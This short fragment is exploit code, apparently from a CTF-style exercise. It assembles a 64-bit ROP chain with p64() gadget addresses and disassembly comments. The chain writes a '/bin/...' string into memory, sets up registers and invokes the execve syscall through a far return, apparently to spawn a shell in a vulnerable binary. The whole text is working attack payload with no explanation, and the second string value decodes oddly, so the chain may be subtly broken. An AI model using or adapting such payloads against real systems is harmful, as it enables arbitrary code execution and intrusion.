payload = p64(0x4017ca)
#0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x6e69622f)+p64(0x48a0ad)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017ca)
# 0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x68662f)+p64(0x48a0b1)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x43058b)
# 0x000000000043058b: pop rax; ret; 
payload += p64(0x0)+p64(0x4556d6)
# 0x00000000004556d6: cdq; ret 0; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x48a070)+p64(0x43058b)
# 0x000000000043058b: pop rax; ret; 
payload += p64(0x0)+p64(0x45f370)
# 0x000000000045f370: xchg esi, eax; ret; 
payload += p64(0x437d67)
# 0x437d67: pop rax ; retf
payload += p64(0x3b)+p32(0x40fc27)+p32(0x33)
# 0x000000000040fc27: syscall; 
payload += b''
